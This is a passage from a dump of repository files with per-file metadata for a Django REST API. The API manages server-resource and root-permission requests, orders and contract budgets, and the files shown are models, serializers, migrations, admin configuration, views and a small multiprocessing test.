('applyTime',)\n\nclass Os(models.Model):\n type = models.CharField(max_length=20,verbose_name=u\"操作系统\",blank=False)\n\n class Meta:\n verbose_name = \"操作系统\"\n verbose_name_plural = verbose_name\n\nclass Environment(models.Model):\n name = models.CharField(max_length=30,verbose_name=u\"环境类别\",blank=False)\n\n class Meta:\n verbose_name = \"环境类别\"\n verbose_name_plural = verbose_name\n\nclass Source(models.Model):\n name = models.CharField(max_length=30,verbose_name=u\"来源\",blank=False)\n\n class Meta:\n verbose_name = \"项目来源\"\n verbose_name_plural = verbose_name"
},
{
"alpha_fraction": 0.5473145842552185,
"alphanum_fraction": 0.5959079265594482,
"avg_line_length": 19.578947067260742,
"blob_id": "d74025f8d7bcd1d9938bb8e982ed688009a452a6",
"content_id": "5d7c0e730eaabb6949e256342075905296b04aa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/apps/application/migrations/0011_remove_serverapplication_appid.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-01 17:10\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0010_order'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='serverapplication',\n name='appId',\n ),\n ]\n"
},
{
"alpha_fraction": 0.5345167517662048,
"alphanum_fraction": 0.6094674468040466,
"avg_line_length": 24.350000381469727,
"blob_id": "934d60e76cdf409f1c075713d411eac68b987157",
"content_id": "bd29081be5d78b1bbd9fbc51472db9ca8fc47500",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 507,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 20,
"path": "/apps/users/migrations/0002_userprofile_team.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-14 22:06\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='team',\n field=models.CharField(default='\\u7cfb\\u7edf\\u5ba4', max_length=50, verbose_name='\\u6240\\u5728\\u79d1\\u5ba4'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6733333468437195,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 20.285715103149414,
"blob_id": "0cbb7d9783d37ed63c637b6da6a1e20ca6cd3319",
"content_id": "705626448219d3cf03206f8f69ca137f406ad570",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 7,
"path": "/apps/application/apps.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding: utf-8 -*-\nfrom django.apps import AppConfig\n\n\nclass ApplicationConfig(AppConfig):\n name = 'application'\n verbose_name = \"用户申请\"\n\n"
},
{
"alpha_fraction": 0.6412087678909302,
"alphanum_fraction": 0.6478021740913391,
"avg_line_length": 39.46666717529297,
"blob_id": "f73094b3c612fe139aa25e80abe5bb2dc912ba00",
"content_id": "22b92f5eeb48c849b45761d568ec75dd67708411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1820,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 45,
"path": "/apps/contractBudget/serializer.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/3/22 15:13'\n\nfrom rest_framework import serializers\nfrom .models import Project, Budget, Supplier, Contract, PaymentPlan,PaymentRecord\n\n\nclass ProjectSerizlizer(serializers.ModelSerializer):\n class Meta:\n model = Project\n fields = ('id', 'projectId', 'name', 'type', 'department', 'investment', 'maintain',\n 'development', 'total', 'status', 'comment', 'add_time', 'lastModified')\n\n\nclass BudgetSerializer(serializers.ModelSerializer):\n class Meta:\n model = Budget\n fields = ('id', 'project', 'year', 'investment', 'maintain', 'development', 'total')\n\n\nclass SupplierSerializer(serializers.ModelSerializer):\n class Meta:\n model = Supplier\n fields = ('id', 'supplierId', 'accountName', 'bankMaster', 'bankBranch', 'accountId', 'accountAddr',\n 'contact', 'phone', 'email', 'add_time')\n\n\nclass ContractSerializer(serializers.ModelSerializer):\n class Meta:\n model = Contract\n fields = ('id', 'contractId', 'lawId', 'project', 'status', 'supplierId', 'accountName',\n 'bankMaster', 'investment', 'maintain', 'development', 'total', 'signDate', 'subscriber',\n 'handlerPerson', 'comment','name')\n\nclass PaymentPlanSerializer(serializers.ModelSerializer):\n class Meta:\n model = PaymentPlan\n fields = ('id','contract','paymentTime','numOfPayments','ratioOfPayments','investment','maintain','development',\n 'total','items')\n\nclass PaymentRecordSerializer(serializers.ModelSerializer):\n class Meta:\n model = PaymentRecord\n fields = ('id','contractId','paymentPlanId','paymentPlanPk','numOfPayments','billNum','investment','maintain','development','total','billTime','processTime')"
},
{
"alpha_fraction": 0.6546090841293335,
"alphanum_fraction": 0.6686114072799683,
"avg_line_length": 33.2400016784668,
"blob_id": "db567da2cb29b0e6e1cb5fadf42578a1d68ff59c",
"content_id": "45f304087d857cab919857096be125e28499ea71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 857,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 25,
"path": "/apps/application/serializers.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/15 10:22'\n\nfrom rest_framework import serializers\n\nfrom .models import RootApplication,ServerApplication,Order\n\nclass RootApplicationSerializer(serializers.ModelSerializer):\n class Meta:\n model = RootApplication\n fields = ('id','user','ip','reason','status','applyTime','deadline','email')\n\nclass ServerApplicationSerializer(serializers.ModelSerializer):\n class Meta:\n model = ServerApplication\n fields = ('id','user','username','ip','source','environment','os','deadline','reason','email','orderId','status'\n ,'applyTime','department','lastModified','cpu','memory','store')\n\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = ('id','orderId','status','applyTime','lastModified')\n\n"
},
{
"alpha_fraction": 0.5852272510528564,
"alphanum_fraction": 0.6325757503509521,
"avg_line_length": 24.14285659790039,
"blob_id": "5eed198a30c9d159b48978babfc1bf2ae92ef050",
"content_id": "bc41fec6f684dda60dd6769e4a572ccb01a926ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 21,
"path": "/apps/serverApplication/migrations/0002_auto_20170211_1927.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-11 19:27\nfrom __future__ import unicode_literals\n\nimport DjangoUeditor.models\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='application',\n name='comment',\n field=DjangoUeditor.models.UEditorField(blank=True, default='', verbose_name='\\u5907\\u6ce8'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.49414390325546265,
"alphanum_fraction": 0.500278890132904,
"avg_line_length": 33.5,
"blob_id": "8181e54e7f6548150081df2760443a8268ac9e12",
"content_id": "32ac3b20ec4fa18b3426ff9619591d27bef57daf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1829,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 52,
"path": "/apps/users/adminx.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/9 12:13'\nimport xadmin\nfrom xadmin.plugins.auth import UserAdmin\nfrom .models import UserProfile\nfrom xadmin import views\nfrom django.contrib.auth.models import User\nfrom xadmin.layout import Fieldset, Main, Side, Row, FormHelper\nfrom django.utils.translation import ugettext as _\nclass UserProfileAdmin(UserAdmin):\n def get_form_layout(self):\n if self.org_obj:\n self.form_layout = (\n Main(\n Fieldset('',\n 'username', 'password',\n css_class='unsort no_title'\n ),\n Fieldset(_('Personal info'),\n Row('first_name', 'last_name'),\n 'email'\n ),\n Fieldset(_('Permissions'),\n 'groups', 'user_permissions'\n ),\n Fieldset(_('Important dates'),\n 'last_login', 'date_joined'\n ),\n ),\n Side(\n Fieldset(_('Status'),\n 'is_active', 'is_staff', 'is_superuser',\n ),\n )\n )\n return super(UserAdmin, self).get_form_layout()\n\nclass BaseSetting(object):\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n site_title = \"中国银联系统服务平台管理系统\"\n site_footer = \"中国银联\"\n menu_style = \"accordion\"\n\n# xadmin.site.unregister(User)\n# xadmin.site.register(UserProfile,UserProfileAdmin)\nxadmin.site.register(views.BaseAdminView,BaseSetting)\nxadmin.site.register(views.CommAdminView,GlobalSettings)"
},
{
"alpha_fraction": 0.535251796245575,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 26.799999237060547,
"blob_id": "bd863603b0e1d45245a30d480f77ea9b30c367d1",
"content_id": "5c0118065e4a655c06dadc6df6c95fbd13e3c968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 25,
"path": "/apps/application/migrations/0009_auto_20170228_1831.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 18:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0008_auto_20170228_1500'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='serverapplication',\n name='email',\n field=models.CharField(max_length=100, verbose_name='\\u8054\\u7cfb\\u90ae\\u7bb1'),\n ),\n migrations.AlterField(\n model_name='serverapplication',\n name='ip',\n field=models.CharField(blank=True, max_length=20, verbose_name='IP'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6510319113731384,
"alphanum_fraction": 0.6547842621803284,
"avg_line_length": 21.25,
"blob_id": "455e16fe780d45a00d47c7223b97173a3d6a44ba",
"content_id": "fd8ac66d533de7e9e25060ec97c23a400e013002",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 533,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 24,
"path": "/functionTests/test.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "import multiprocessing\nimport time\n\ndef first():\n print(\"there is no problem here\")\n\ndef second():\n raise RuntimeError(\"Error Raised\")\n\ndef third():\n time.sleep(3)\n print(\"This process will be terminated\")\n\nworkers = [multiprocessing.Process(target=first),multiprocessing.Process(target=second),multiprocessing.Process(target=third)]\n\nif __name__ == '__main__':\n \n for w in workers:\n w.start()\n workers[-1].terminate()\n for w in workers:\n w.join()\n for w in workers:\n print(w.exitcode)"
},
{
"alpha_fraction": 0.6271272301673889,
"alphanum_fraction": 0.654813289642334,
"avg_line_length": 50.78947448730469,
"blob_id": "5759b3cb073f5d9204d8e1eedeb1af4a4c6bda5a",
"content_id": "76645b2e2f4dd2ebb4b00fa37e3a0d4c4373a659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4423,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 76,
"path": "/apps/application/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom datetime import datetime\nfrom django.db import models\nfrom django.db.models import Q\n# Create your models here.\n\n#root权限申请\nclass RootApplication(models.Model):\n user = models.CharField(max_length=50,verbose_name=\"申请人\",blank=False)\n ip = models.CharField(max_length=50,verbose_name=\"申请ip\",blank=False)\n reason = models.CharField(max_length=500,verbose_name=\"申请原因\",default=\"\",blank=True)\n status = models.CharField(choices=(('申请中',\"申请中\"),(\"使用中\",\"使用中\"),(\"已到期\",\"已到期\"),(\"已回收\",\"已回收\")),default=\"申请中\",\n max_length=20,verbose_name=\"申请状态\")\n applyTime = models.DateTimeField(default=datetime.now,verbose_name=\"申请时间\")\n deadline = models.DateTimeField(blank=False,verbose_name=\"截止日期\")\n email = models.EmailField(max_length=100,blank=False,verbose_name=\"联系邮箱\")\n\n class Meta:\n verbose_name = \"root权限申请\"\n verbose_name_plural = verbose_name\n\n def setExpiredApplication(self):\n today = datetime.now().strftime(\"%Y-%m-%d\")\n applications = RootApplication.objects.all().filter(Q(deadline__lte=today),Q(status=\"使用中\"))\n for application in applications:\n application.status = \"已到期\"\n application.save()\n def getExpiredApplication(self):\n return RootApplication.objects.all().filter(status=\"已到期\")\n\n\n# 服务器环境申请\n\nclass ServerApplication(models.Model):\n user = models.CharField(max_length=20,verbose_name=\"使用人\",blank=False)\n username = models.CharField(max_length=200,verbose_name=\"用户名\",blank=False)\n ip = models.CharField(max_length=20,verbose_name=\"IP\",blank=True)\n source = models.CharField(max_length=50,verbose_name=\"来源\",blank=False)\n environment = models.CharField(max_length=50,verbose_name=\"环境类别\",blank=False)\n os = models.CharField(max_length=20,verbose_name=\"操作系统\",blank=False)\n deadline = models.DateTimeField(blank=False,verbose_name=\"截止日期\")\n reason = models.CharField(max_length=500,verbose_name=\"申请原因\",blank=False)\n email = models.CharField(max_length=100,verbose_name=\"联系邮箱\",blank=False)\n orderId = models.CharField(max_length=200,verbose_name=\"订单id\",blank=False)\n department = models.CharField(max_length=200,verbose_name=\"所在科室\",default=\"系统室\")\n status = models.CharField(choices=(('申请中','申请中'),('审核通过-分配中','审核通过-分配中'),\n (\"使用中\",\"使用中\"),(\"拒绝\",\"拒绝\"),(\"申请回收中\",\"申请回收中\"),(\"延期中\",\"延期中\"),\n (\"申请延期中\",\"申请延期中\"),(\"已到期\",\"已到期\")\n ,(\"已回收\",\"已回收\"),(\"部分回收\",\"部分回收\")),default=\"申请中\",max_length=20)\n applyTime = models.DateTimeField(default=datetime.now, verbose_name=\"申请时间\")\n lastModified = models.DateTimeField(default=datetime.now,verbose_name=\"最后修改时间\")\n\n cpu = models.CharField(choices=(('1C','1C'),('2C','2C'),('4C','4C'),('8C','8C'),('16C','16C'),('32C','32C')),default=\"1C\",max_length=10)\n memory = models.CharField(choices=((\"2G\",\"2G\"),(\"4G\",\"4G\"),(\"8G\",\"8G\"),(\"16G\",\"16G\"),(\"32G\",\"32G\"),(\"64G\",\"64G\")),default=\"2G\",max_length=10)\n store = models.CharField(choices=((\"20G\",\"20G\"),(\"40G\",\"40G\"),(\"100G\",\"100G\")),default=\"20G\",max_length=10)\n\n class Meta:\n verbose_name = \"服务器申请\"\n verbose_name_plural = verbose_name\n\n def getExpiredApplication(self):\n return ServerApplication.objects.all().filter(status=\"已到期\")\n\n\nclass Order(models.Model):\n orderId = models.CharField(max_length=200,blank=False)\n user = models.CharField(max_length=200,blank=False)\n email = models.EmailField(max_length=200,blank=True)\n applyTime = models.DateTimeField(default=datetime.now,verbose_name=\"申请时间\")\n status = models.CharField(choices=(('申请中', '申请中'),('使用中','使用中'),(\"已回收\", \"已回收\")), default=\"申请中\", max_length=20)\n lastModified = models.DateTimeField(default=datetime.now,verbose_name=\"最后修改时间\")\n class Meta:\n verbose_name = \"订单\"\n verbose_name_plural = verbose_name\n\n"
},
{
"alpha_fraction": 0.6230303049087524,
"alphanum_fraction": 0.6375757455825806,
"avg_line_length": 29.518518447875977,
"blob_id": "7b3f5af4944c9ca3c270836be84683d99f3644ad",
"content_id": "f42954bea6b8772a67dc3bf51a563ed8ddb1e9ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 825,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 27,
"path": "/apps/serverApplication/serializer.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/10 16:21'\nfrom rest_framework import serializers\nfrom .models import Application, Os, Environment, Source\nclass ApplicationSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Application\n fields = ('id', 'ip', 'username', 'user', 'team', 'source', 'environment',\n 'os', 'applyTime', 'expireDate', 'comment', 'lastModified', 'received')\n\n\nclass OsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Os\n fields = ('id','type')\n\nclass EnvironmentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Environment\n fields = ('id','name')\n\nclass SourceSerializer(serializers.ModelSerializer):\n class Meta:\n model = Source\n fields = ('id','name')\n\n"
},
{
"alpha_fraction": 0.6303656697273254,
"alphanum_fraction": 0.6399046182632446,
"avg_line_length": 36.02941131591797,
"blob_id": "fcf838830d0c4b0f09862f3a9263ce49b091a9ca",
"content_id": "3a73d54cfc433c1fe5f6dd241d5aae34953757a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 34,
"path": "/apps/serverApplication/adminx.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/10 15:41'\nfrom .models import Application, Os,Environment,Source\nimport xadmin\nclass ApplicationAdmin(object):\n list_display = ['ip', 'username', 'user', 'team','source','environment','os','applyTime','expireDate','comment',\n 'lastModified','received']\n search_fields = ['ip', 'username', 'user', 'team','source','environment','os','applyTime','expireDate','comment',\n 'received']\n list_filter = ['ip', 'username', 'user', 'team','source','environment','os','applyTime','expireDate','comment',\n 'lastModified','received']\n model_icon = 'fa fa-info'\n style_fields = {\"comment\":\"ueditor\"}\n import_excel = True\nclass OsAdmin(object):\n list_display = ['type']\n search_fields = ['type']\n list_filter = ['type']\n\nclass EnvironmentAdmin(object):\n list_display = ['name']\n search_fields = ['name']\n list_filter = ['name']\n\nclass SourceAdmin(object):\n list_display = ['name']\n search_fields = ['name']\n list_filter = ['name']\n\nxadmin.site.register(Application,ApplicationAdmin)\nxadmin.site.register(Os,OsAdmin)\nxadmin.site.register(Environment,EnvironmentAdmin)\nxadmin.site.register(Source,SourceAdmin)"
},
{
"alpha_fraction": 0.5602968335151672,
"alphanum_fraction": 0.6289424896240234,
"avg_line_length": 25.950000762939453,
"blob_id": "c65dda131b4df48a37fc97f010ef8e9cef86f628",
"content_id": "89c1c2979f99184a34ffdff20bd3d2b85f573c05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0009_paymentrecord_paymentplanid.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-01 11:07\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0008_paymentrecord'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='paymentrecord',\n name='paymentPlanId',\n field=models.CharField(blank=True, default='', max_length=50, verbose_name='\\u4ed8\\u6b3e\\u8ba1\\u5212\\u7f16\\u53f7'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.44243985414505005,
"alphanum_fraction": 0.6348797082901001,
"avg_line_length": 45.560001373291016,
"blob_id": "3ca83092a7aa6fecde0e6b39ac78de01b4a6161f",
"content_id": "0e04425decc25cda44daf1f71eb05e77749befe1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 544,
"num_lines": 25,
"path": "/apps/application/migrations/0008_auto_20170228_1500.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 15:00\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0007_auto_20170228_1103'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='serverapplication',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u5206\\u914d\\u5b8c\\u6210', '\\u5206\\u914d\\u5b8c\\u6210'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u56de\\u6536\\u7533\\u8bf7\\u4e2d', '\\u56de\\u6536\\u7533\\u8bf7\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n migrations.AlterField(\n model_name='serverapplication',\n name='orderId',\n field=models.CharField(blank=True, max_length=200, verbose_name='\\u8ba2\\u5355id'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6388856768608093,
"alphanum_fraction": 0.6445497870445251,
"avg_line_length": 38.86635971069336,
"blob_id": "18ee960b78933520e8c750328ca5e6dd6686f783",
"content_id": "9556ac097a30b306b3e49c6e6f392534e02ba9aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9009,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 217,
"path": "/apps/application/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.shortcuts import render\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework import generics\nfrom django.db.models import Q\nfrom django.http import Http404\nimport datetime\nfrom .serializers import RootApplicationSerializer,ServerApplicationSerializer,OrderSerializer\nfrom .models import RootApplication,ServerApplication,Order\nfrom utils import email_send\nfrom utils import findDate\n# Create your views here.\n\nclass Pagination(LimitOffsetPagination):\n default_limit = 10\n limit_query_param = \"limit\"\n offset_query_param = \"offset\"\n max_limit = None\n\nclass RootApplicationListView(generics.ListCreateAPIView):\n queryset = RootApplication.objects.all()\n pagination_class = Pagination\n serializer_class = RootApplicationSerializer\n\n#根据姓名、ip查询申请信息,姓名精确匹配,ip模糊匹配\n def get_queryset(self):\n user = self.request.query_params.get(\"user\",None)\n ip = self.request.query_params.get(\"ip\",None)\n queryset = RootApplication.objects.all()\n aQ = Q()\n if user is not None:\n aQ.add(Q(user=user),Q.AND)\n if ip is not None:\n aQ.add(Q(ip__startswith=ip),Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n\n\n # def get(self,request):\n # rootApplications = RootApplication.objects.all()\n # serializer = RootApplicationSerializer(rootApplications,many=True)\n # return Response(serializer.data)\n\n def post(self,request):\n serializer = RootApplicationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n email = request.data.get(\"email\", '')\n user = request.data.get(\"user\", \"\")\n ip = request.data.get(\"ip\", \"\")\n content = \"Hi \" + user + \", 你申请了 \" + ip + \"root权限,我们处理完毕后将以邮件的形式通知你;或者你也可以在'我的root权限申请中'跟踪申请状态\"\n email_send.send_email(email, content)\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\nclass RootApplicationDetailView(APIView):\n def get_object(self,pk):\n try:\n return RootApplication.objects.get(pk=pk)\n except RootApplication.DoesNotExist:\n raise Http404\n\n def get(self,request,pk):\n rootapplication = self.get_object(pk)\n serializer = RootApplicationSerializer(rootapplication)\n return Response(serializer.data)\n\n def put(self,request,pk):\n rootapplication = self.get_object(pk)\n serializer = RootApplicationSerializer(rootapplication,data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self,request,pk):\n rootapplication = self.get_object(pk)\n rootapplication.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass ServerApplicationListView(generics.ListCreateAPIView):\n queryset = ServerApplication.objects.all()\n pagination_class = Pagination\n serializer_class = ServerApplicationSerializer\n def get_queryset(self):\n user = self.request.query_params.get(\"user\", None)\n orderId = self.request.query_params.get(\"orderId\", None)\n status = self.request.query_params.get(\"status\",None)\n timeKey = self.request.query_params.get('timeKey',None)\n queryset = ServerApplication.objects.all()\n aQ = Q()\n # print datetime.datetime.now().date()\n if user is not None:\n aQ.add(Q(user=user), Q.AND)\n if orderId is not None and orderId != \"\":\n aQ.add(Q(orderId=orderId), Q.AND)\n if status is not None and status != \"\":\n aQ.add(Q(status=status),Q.AND)\n if timeKey is not None and timeKey != \"\":\n days = findDate.getDays(timeKey)\n if days==2017:\n aQ.add(Q(applyTime__startswith=days),Q.AND)\n elif days==0:\n aQ.add(Q(applyTime__lte=datetime.datetime.now()),Q.AND)\n else:\n date = findDate.getDate(days)\n aQ.add(Q(applyTime__gte=date) & Q(applyTime__lte=datetime.datetime.now()),Q.AND)\n\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n\n\n\n def post(self, request, *args, **kwargs):\n serializer = ServerApplicationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\nclass UsingApplicationDetailView(APIView):\n def get_object(self,pk):\n try:\n return ServerApplication.objects.get(pk=pk)\n except ServerApplication.DoesNotExist:\n raise Http404\n def get(self,request,pk):\n serverApplication = self.get_object(pk)\n serializer = ServerApplicationSerializer(serverApplication)\n return Response(serializer.data)\n\n def put(self,request,pk):\n serverApplication = self.get_object(pk)\n serializer = ServerApplicationSerializer(serverApplication,data=request.data)\n if serializer.is_valid():\n serializer.save()\n email = request.data.get(\"email\", '')\n user = request.data.get(\"user\", \"\")\n ip = request.data.get(\"ip\", \"\")\n statusDesc = request.data.get(\"status\")\n content = \"Hi \" + user + \", 你提交了 \" + ip +statusDesc[0:-1] +\",我们处理完毕后将以邮件的形式通知你\"\n\n email_send.send_email(email, content,send_type=\"服务器处理\")\n return Response(serializer.data)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n def delete(self,request,pk):\n serverapplication = self.get_object(pk)\n serverapplication.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass OrderListView(generics.ListCreateAPIView):\n queryset = Order.objects.all()\n pagination_class = Pagination\n serializer_class = OrderSerializer\n # def get_queryset(self):\n # user = self.request.query_params.get(\"user\", None)\n # ip = self.request.query_params.get(\"status\", None)\n # queryset = RootApplication.objects.all()\n # aQ = Q()\n # if user is not None:\n # aQ.add(Q(user=user), Q.AND)\n # if ip is not None:\n # aQ.add(Q(ip__startswith=status), Q.AND)\n # queryset = queryset.filter(aQ).order_by(\"id\")\n # return queryset\n\n\n def post(self, request, *args, **kwargs):\n serializer = OrderSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n user = self.request.data.get(\"user\", None)\n orderId = self.request.data.get(\"orderId\", None)\n email = self.request.data.get(\"email\",None)\n print(user,orderId,email)\n content = \"Hi \" + user + \", 你申请了服务器资源,订单号为\"+orderId+\",我们处理完毕后将以邮件的形式通知你;或者你也可以在'我的服务器申请中'跟踪申请状态\"\n email_send.send_email(email, content,\"服务器资源申请\")\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\nclass UsingApplicationsListView(generics.ListCreateAPIView):\n queryset = ServerApplication.objects.all()\n pagination_class = Pagination\n serializer_class = ServerApplicationSerializer\n\n # 获取状态为申请中或延期中的申请记录\n def get_queryset(self):\n user = self.request.query_params.get(\"user\", None)\n orderId = self.request.query_params.get(\"orderId\", None)\n queryset = ServerApplication.objects.filter(user=user)\n aQ = Q()\n # aQ.add(Q(user=user),Q.AND)\n aQ.add(Q(status=\"使用中\") | Q(status=\"延期中\"), Q.AND)\n if orderId is not None and orderId != \"\":\n aQ.add(Q(orderId=orderId), Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n # def get(self, request, *args, **kwargs):\n # user = self.request.query_params.get(\"user\", None)\n # orderId = self.request.query_params.get(\"orderId\", None)\n # queryset = ServerApplication.objects.filter(user=user)\n # aQ = Q()\n # aQ.add(Q(status=\"申请中\"), Q.AND)\n # if orderId is not None and orderId != \"\":\n # aQ.add(Q(orderId=orderId), Q.AND)\n # queryset = queryset.filter(aQ).order_by(\"id\")\n # return queryset\n"
},
{
"alpha_fraction": 0.5041208863258362,
"alphanum_fraction": 0.6002747416496277,
"avg_line_length": 43.121212005615234,
"blob_id": "913c7423ef90abb39d67ad712b507992af59f216",
"content_id": "f937c390de7b74631dab8f7ce62ede33a961580b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
